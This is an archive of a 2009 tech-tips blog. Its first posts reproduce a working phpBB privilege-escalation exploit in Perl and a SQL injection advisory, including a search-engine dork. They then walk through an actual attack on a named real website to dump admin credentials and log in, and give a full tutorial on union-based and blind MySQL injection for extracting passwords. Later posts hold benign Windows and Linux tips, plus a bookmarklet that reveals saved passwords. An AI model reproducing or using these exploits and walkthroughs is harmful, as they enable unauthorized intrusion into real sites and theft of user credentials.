FiX PC Errors

PHPBB Vuln part-1

2009-05-28T15:45:00.000-07:00

Code:

#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit # This script uses the vulerability in autologinid variable # More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563 # # Just gives an user on vulnerable forum administrator rights. # You should register the user before using this ;-) # by Kutas, kutas@mail15.com #P.S. I dont know who had made an original exploit, so I cannot place no (c) here... # but greets goes to Paisterist who made an exploit for Firefox cookies... if (@ARGV < host =" $ARGV[0];" path =" $ARGV[1];" user =" $ARGV[2];" proxy =" $ARGV[3];" request = "http://" browser =" LWP::UserAgent-">new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;

if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;

if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

2009-05-28T09:21:00.000-07:00

Today we are going to learn the web applications part of milw0rm.com

so

lets go to Milw0rm shall we

Now go to web applications

and you see a whole lot of stuff right were gonna look for sql injection vulnerability.

I found this

right here

and it show you the following

Code:

 
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
|    __)_ /    \  \//    ~    \/   |   \
|        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
     \/         \/       \/         \/

                                     .OR.ID
ECHO_ADV_100$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability -----------------------------------------------------------------------------------------  Author       : M.Hasran Addahroni Date         : July, 14 th 2008 Location     : Jakarta, Indonesia Web          : http://e-rdc.org/v1/news.php?readmore=102
Critical Lvl : Medium
Impact       : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Comdev Web Blogger
version     : <= 4.1.3 Vendor      : http://www.comdevweb.com/blogger.php
Description :

Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
the Web Blogger to Your Web Design Page â€¢ Multiple user accounts to create & invite friends to their own blogs â€¢ Hot Blogs,
Latest Blogs â€¢ RSS News Feeds â€¢ Blogs Categorisation â€¢ Hot Blogs & Latest Blogs â€¢ Search Blogs â€¢ Mini Calendar â€¢ Monthly Archiveâ€¢
Links to Friends' Blog â€¢ Public or Friends View Only Blogs â€¢ Set Post Comments Permission â€¢ Friends Login â€¢ Forms Submission with
CAPTCHA Image Verification â€¢ WYSIWYG Editor for Blog & Comment â€¢ Notify Friends of New Blog â€¢ Set View & Post Comment Permissions â€¢
sSet Date & Time Format â€¢ Local Time Zone â€¢ Pre-defined Front-end CSS â€¢ Personalized Emails & Auto-Responders â€¢
Installation Support available

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used
in an sql query.
This can be exploited thru the browser to manipulate SQL queries and pull the username and password
from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,passwo rd),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20 from%20sys_user/*

Admin Login at http://www.example.com/[PATH]/oneadmin/

Dork:
~~~~
Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"


Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini


Timeline:
~~~~~~~~

- 11 - 07 - 2008 bug found
- 11 - 07 - 2008 vendor contacted
- 14 - 07 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cyb  ertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_  gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-07-15]

now look at

Code:

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,passwo rd),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20 from%20sys_user/*

This is the sql injection into the site

there are 2 separate ones and under that is the DORK:

Code:

 Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth

The dork is what you are going to type in google or whatever search engine you want

and the search engine will give you a list of websites that power by that

so go into your search engine and paste that

or type

Code:

allinurl:".php?domain= arcyear=2007 arcmonth

so you see a whole bunch of websites right and your looking for the dork

so the website we are going to use is listed below
[IMG]file:///C:/DOCUME%7E1/gadow/LOCALS%7E1/Temp/moz-screenshot.jpg[/IMG]

Code:

[IMG]file:///C:/DOCUME%7E1/gadow/LOCALS%7E1/Temp/moz-screenshot-1.jpg[/IMG]http://uhrionline.org/blog.php?domai...07&arcmonth=10

so you got the sites that google provided so look for any site that has the dork and click it

now once you are at that site get the sql injection code and paste it in the url so it will look like this

Code:

http://uhrionline.org/blog.php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--

then hit enter

u see the admin username and password along with other users as well that password is encrypted so user john the ripper or cain and abel to decrypt it.. in this case it is unencrypted and there is NO PW (WTF LOL)

and then you will have to find the admin login page i would 1. go through every link right click view source and look for a admin login page if its not there get the cracked version of acunetix and scan that website and it will show you the admin page

then you can just login and do whatever you want

now what i did was sql inject the site and it gave me the following

admin::

anyways Milw0rm said look for /oneadmin

well oneadmin does not exist..

so then we go through every link looking at the source code looking for a login page didn't find one my last step was to scan the site with all of its links

After scanning I came up with

Code:

http://www.uhrionline.org/oadmin/index.php?

oh they think they are sneaky bastards

so now we log in :P

with the un admin and pw is blank
and get this

SQL Injection part - 1

2009-05-27T08:17:00.000-07:00

SQL Injection (MySQL)

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).

1.SQL Injection classic

2.Blind SQL Injection

So let's start with some action

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That's all in this part, now we can proceed on harder part :)

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D

Hope you learned something from this paper.

Have FUN! (:

To be continued and updated...

milw0rm.com [2008-05-22]

Virus Hoax: Jdbgmgr.exe Is Not a Virus

2009-04-03T03:45:00.001-07:00

This email hoax urges users to delete this necessary file from their computer. It may also make reference to a Teddy Bear icon, which is the standard icon for that file. The file is actually the Microsoft Debugger Registrar for Java, and should not be deleted.

This hoax has appeared in several languages.

The email is similar to the following one:

To all of my email contacts,

Unfortunately a virus has been passed to me and many other people, you may already have it from some other source - through an address book virus
which also infected my address book. Since you are in my address book, you will probably find it in your computer, too. The virus (called jdbg.exe) is
not detected by Norton or McAfee Anti-virus systems.

The virus sits quietly for 14 days before damaging the system. It is sent automatically by 'messenger' and by address book, whether or not you sent
e-mail to your contacts. Basically, that means you will pass it along Unknowingly, as I did. I was sent this email and am now passing it on to you as to how to
check for the virus and how to get rid of it. Please do this! It's very simple to do and takes about 3 mins

1. Go to Start, then click your 'Find' or 'Search' option

2. In the folder option, type the name... jdbgmgr.exe

3. Be sure to search your C. Drive and all the sub folders and any other drives you may have

4. Click 'Find Now'

5. The virus has a teddy bear icon with the name jdbgmgr.exe Do not open it!

6. Go to Edit (on the menu bar) and choose "Select All" to highlight the file without opening it.

7. Now go to File (on the menu bar) and select delete. It will then go to the recycle bin.

If you find the virus, you must contact all the people in your Address Book so that they may eradicate the virus from their own address books.

To do this:

1. Open a new e-mail message

2. click the icon Address Book next to 'TO'

3. Highlight every name and add to "BCC"

4. Copy this message and paste to e-mail

This will affect everyone in your address book. So send it now!

Prevention

This is a hoax; no prevention is required.

Please ignore any messages regarding this hoax and do not pass on messages. Passing on messages about the hoax only serves to further propagate it.

How to Repair the file if I deleted it?

Unless you are a Java developer, the absence of the file should not create any problems, however if do encounter problems with Java applications, you'll need to reinstall it. Regardless of the Windows version you are running, you can download the Sun Java Virtual Machine to regain functionality.

What is DSL?

2009-04-01T02:35:00.000-07:00

Damn Small Linux is a very versatile 50MB mini desktop oriented Linux distribution.

It was designed to run graphical applications on older PC hardware—for example, machines with 486/early Pentium processors and very little memory.

DSL is a Live CD.

Boot from within a host operating system

It can run inside Windows

You must first download the embedded version (55Mb) at: HEAnet FTP.
Then unzip the zip file anywhere in the PC.
Click on dsl-base.bat

DSL starts as if it installed on your hard drive.

Also, if your computer is already connected, DSL-Embedded automatically recognize your connection.

Boot from a USB pen drive.

1. Download the dsl-embedded.zip and extract the contents using 7-Zip to
your USB flash drive
2. Download syslinux-3.36.zip and unzip the files to your computer in syslinux
directory (You must create syslinux directory).
3. From Windows click start >> run >> type cmd
4. From the command window, type cd \syslinux\win32
5. Type syslinux.exe -ma X: (replace X with your USB drive letter) to make
the drive bootable
6. Reboot your computer and set your system BIOS or Boot Menu to boot from
the USB device.

Fix Some Missing Options In XP

2009-03-28T09:50:00.000-07:00

I. Registry editing has been disabled by your administrator.

Fix:

1. Open Start Menu >> Run, type: gpedit.msc and press Enter key.

2. Navigate to

User Configuration\Administrative Templates\System\

3. In the right side of the screen double click “Prevent Access To Registry Editing Tools" and select Disabled.

and press Enter key.

II. Task Manager has been disabled by your administrator.

Fix:

1. Open Start Menu >> Run, type: gpedit.msc and press Enter key.

2. Navigate to User Configuration\Administrative Templates\System\Ctrl+Alt+Del Options

3. In the right side of the screen double click "Remove Task Manager”and select Disabled.

III. Shutdown option missing in windows

Fix:

Open Start Menu >> Run, type gpedit.msc and press Enter key.

2. Navigate to

User Configuration\Administrative Templates\Start Menu and Taskbar

3. Double click “Remove and Prevent Access To The Shut Down Command” and select Disabled.

How to find the IP address & address of the sender in email

2009-03-28T03:49:00.000-07:00

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the email headers, Click on the inverted triangle beside Reply.
Select Show Orginal.
4. Look for Received: from followed by the IP address between square
brackets [ ]. That is be the IP address of the sender.

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. Click on the Standard Header.
5. Select Full Header.
6. Look for Received: from followed by the IP address

Tracking the location of an IP address

Now that we have our originating IP address, let’s find out where that is! You can do this by perform a location lookup on the IP address.

Simple JavaScript Extract Login Form Password

2009-03-21T11:42:00.001-07:00

If you’ve lost or forgotten web service login passwords stored in the web browser password manager, such as IE7 AutoComplete or Firefox Remembered Password / Master Password, don’t be panic and proceed to reinstall IE7 or Firefox! If someone ask you to reinstall, remember him and understand his motif!

Reinstalling IE7 or Firefox will NOT restore your forgotten or lost password. Indeed, reinstallation will make the lost passwords become permanently unrecoverable (unless you recall it in dream)!

As long as you can still login to web services (Gmail, Live Mail, Blogger, Wordpress, etc), but just that you cannot remember the real password behind those asterisk (e.g. ***), here is a simple JavaScript snippet to resolve the small matter in a second!

First, make sure the Internet Explorer (IE7) or Firefox 2.x allowed to run JavaScript. Next, proceed to the web services login page and type the user ID to attempt login the web service. Once you’ve seen the web browser remembered password appearing in asterisks, stop the login process and let the asterisks kept inside the password field. Now, copy and paste the following JavaScript snippet to the web browser Address bar, press ENTER key gently and that’s your forgotten password that decrypted from the asterisks!

javascript:password=decrypt();function decrypt(){var passwd,loginform,j,f,i;passwd = '';loginform = document.forms;for(j=0; j<loginform.length; ++j){f = loginform[j];for (i=0; i<f.length; ++i){if (f[i].type.toLowerCase() == "password"){passwd += f[i].value + "\\n";}}}if (passwd != ''){alert("Login password cracked by Javascript:\\n\\n" + passwd);}else{alert("No login password found by javascripts!");}}

Source:Walker

Speed UP Gnome Menu

2009-03-21T09:27:00.000-07:00

Go T0 Applications|Accesoires|Terminal

Typein:

echo "gtk-menu-popup-delay = 0" >> ~/.gtkrc-2.0

and restart your session (CTRL+ALT+BACKSPACE).

You'll notice a nice speed boost when browsing within a category in your menu.

Reinstall Windows XP without re-activating

2009-03-20T14:18:00.000-07:00

When you activate Windows XP, Microsoft stores the data in the Windows Product Activation database files wpa.dbl and Wpa.bak in the folder %systemroot%\system32.

If you change the motherboard or make significant hardware changes, XP will require you to reactive.

But if you plan to reinstall XP on the same hardware, you can back up the activation status and then restore it after you reinstall and avoid the activation process.

You can backup the Windows Product Activation database files to diskette. They are very small.

After you reinstall XP, to restore the Windows Product Activation database files:

Start XP to Minimal Safe mode
Change directory to the \%systemroot%\system32 folder
Rename the newly created wpa.dbl to wpa.nonactivated and wpa.bak, if it exists, to wpabak.nonactivated.
Copy your backed up wpa.dbl and wpb.bak files to the system32 folder
Reboot

This should work if you want to avoid activating XP after a reinstall or restore on the same or very similar hardware. It will not work if the hardware is significantly different from that in place when the Windows Product Activation database files were created. This is not a hack to avoid activating installations.

Source:http://www.marvswindowstips.com

How To Determine If XP was Activated?

2009-03-20T14:08:00.000-07:00

You installed XP and then can't remember if you activated it.

Go to Start then Run and enter the following:

oobe/msoobe /a

Find Your Windows XP Product Key On XP CD Or Your Disk

2009-03-20T13:31:00.001-07:00

How-To: Find Windows XP Product Key from the Windows XP CD:

1) Insert Windows XP CD in your computer.
2) Exit the Autorun introduction.
3) Open My Computer
4) Right Click on the Windows XP cd-rom drive and select explore or open.
5) Search for unattend.txt and mark Search Hidden Files.
7) Open unattend.txt

Your CD’s product key is contained within the unattend.txt file.

If you're preparing to reinstall Windows XP you will need to locate your copy of the Windows XP product key - also known as the CD key.

If you've lost your product key, it's located in the registry but is encrypted and not readable, making finding it difficult.

The key was not encrypted in previous versions of Windows like Windows 98.

RockXp can be very useful, if you lost the product key (CD key) of your Windows operating system.

Free download RockXp

RockXP features:

can retrieve and change your XP Key
can retrieve all Microsoft Products keys
can save your XP activation file
can retrieve your lost XP system passwords
can retrieve your lost RAS (Remote Access Settings) passwords
can also generate new passwords

Speeding up disk access

2009-03-19T17:50:00.000-07:00

Disable access time

Most current operating systems use file systems with advanced functions:

rights management, logging ...

Among other things, NTFS (Windows) and ext3 (Linux) are capable of recording the date of last access to a file.

If it's very useful to control when a file is accessed, it means that for every reading file there a. .. writing disk!

Unless you absolutely need this functionality (secure servers,...), you can disable it.

Some experts believe that Linux kernel can earn up to 10% in disk performance.

1.For Windows 2000/XP/2003/Vista (NTFS only)

Command line

Go to Start> All Programs> Accessories
Right-click the Command Prompt> Run as administrator
Type the following command

fsutil behavior set disablelastaccess 1

and press the ENTER key

If no error message appears, then the command has been executed.

By the registry

Save the base register if necessary
Open the Registry Editor
Go to: HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ FileSystem

Create the variable (right-click, New, DWORD value):

NtfsDisableLastAccessUpdate with value 1

The change should take effect immediately.

2.Linux

Type

$ sudo gedit /etc/fstab

and add the options relatime nodiratime to the partition in question.

Example:

# / Etc / fstab: static file system information.
#
#
proc / proc proc defaults 0 0
/ dev/sda1 / ext3 defaults, errors = remount-ro, relatime, nodiratime 0 1
/ dev/sda2 none swap sw 0 0

Then restart for the root.

Note 1: relatime does not disable the script when file access some software need to know the date of last access. There is the noatime option, which disables all the records in the file access. nodiratime disables scripts when accessing files. Watch the mount manual for more information.

Note 2: All the Linux kernel does not have the option relatime.
In this case, use noatime.

The PC Boot Process - Windows XP

2009-03-19T05:36:00.000-07:00

Fixed Disk
	Power supply switched on.	The power supply performs a self-test. When all voltages and current levels are acceptable, the supply indicates that the power is stable and sends the Power Good signal to the processor. The time from switch-on to Power Good is usually between .1 and .5 seconds.

	The microprocessor timer chip receives the Power Good signal.	With the arrival of the Power Good signal the timer chip stops sending reset signals to the processor allowing the CPU to begin operations.

	The CPU starts executing the ROM BIOS code.	The CPU loads the ROM BIOS starting at ROM memory address FFFF:0000 which is only 16 bytes from the top of ROM memory. As such it contains only a JMP (jump) instruction that points to the actual address of the ROM BIOS code.

	The ROM BIOS performs a basic test of central hardware to verify basic functionality.	Any errors that occur at this point in the boot process will be reported by means of 'beep-codes' because the video subsystem has not yet been initialized.

	The BIOS searches for adapters that may need to load their own ROM BIOS routines.	Video adapters provide the most common source of adapter ROM BIOS. The start-up BIOS routines scan memory addresses C000:0000 through C780:0000 to find video ROM. An error loading any adapter ROM generates an error such as: XXXX ROM Error where XXXX represents the segment address of the failed module.

	The ROM BIOS checks to see if this is a 'cold-start' or a 'warm-start'	To determine whether this is a warm-start or a cold start the ROM BIOS startup routines check the value of two bytes located at memory location 0000:0472. Any value other than 1234h indicates that this is a cold-start.

	If this is a cold-start the ROM BIOS executes a full POST (Power On Self Test). If this is a warm-start the memory test portion of the POST is switched off.	The POST can be broken down into three components: The Video Test initializes the video adapter, tests the video card and video memory, and displays configuration information or any errors. The BIOS Identification displays the BIOS version, manufacturer, and date. The Memory Test tests the memory chips and displays a running sum of installed memory.
		Errors the occur during the POST can be classified as either 'fatal' or 'non-fatal'. A non-fatal error will typically display an error message on screen and allow the system to continue the boot process. A fatal error, on the other hand, stops the process of booting the computer and is generally signaled by a series of beep-codes.
	The BIOS locates and reads the configuration information stored in CMOS.	CMOS (which stands for Complementary Metal-Oxide Semiconductor) is a small area of memory (64 bytes) which is maintained by the current of a small battery attached to the motherboard. Most importantly for the ROM BIOS startup routines CMOS indicates the order in which drives should be examined for an operating systems - floppy first, CD-Rom first, or fixed disk first.
	If the first bootable disk is a fixed disk the BIOS examines the very first sector of the disk for a Master Boot Record (MBR). For a floppy the BIOS looks for a Boot Record in the very first sector.	On a fixed disk the Master Boot Record occupies the very first sector at cylinder 0, head 0, sector 1. It is 512 bytes in size. If this sector is found it is loaded into memory at address 0000:7C00 and tested for a valid signature. A valid signature would be the value 55AAh in the last two bytes. Lacking an MBR or a valid signature the boot process halts with an error message which might read: NO ROM BASIC - SYSTEM HALTED A Master Boot Record is made up of two parts - the partition table which describes the layout of the fixed disk and the partition loader code which includes instructions for continuing the boot process.

MBR	With a valid MBR loaded into memory the BIOS transfers control of the boot process to the partition loader code that takes up most of the 512 bytes of the MBR.	The process of installing multiple operating systems on a single PC usually involves replacing the original partition loader code with a Boot Loader program that allows the user to select the specific fixed disk to load in the next step of the process

Partition Table	The partition loader (or Boot Loader) examines the partition table for a partition marked as active. The partition loader then searches the very first sector of that partition for a Boot Record.	The Boot Record is also 512 bytes and contains a table that describes the characteristics of the partition (number of bytes per sectors, number of sectors per cluster, etc.) and also the jump code that locates the first of the operating system files (IO.SYS in DOS).
Operating System
Boot Record	The active partition's boot record is checked for a valid boot signature and if found the boot sector code is executed as a program.	The loading of Windows XP is controlled by the file NTLDR which is a hidden, system file that resides in the root directory of the system partition. NTLDR will load XP in four stages: 1) Initial Boot Loader Phase 2) Operating System selection 3) Hardware Detection 4) Configuration Selection

NTLDR Initial Phase	During the initial phase NTLDR switches the processor from real-mode to protected mode which places the processor in 32-bit memory mode and turns memory paging on. It then loads the appropriate mini-file system drivers to allow NTLDR to load files from a partition formatted with any of the files systems supported by XP.	Windows XP supports partitions formatted with either the FAT-16, FAT-32, or NTFS file system.

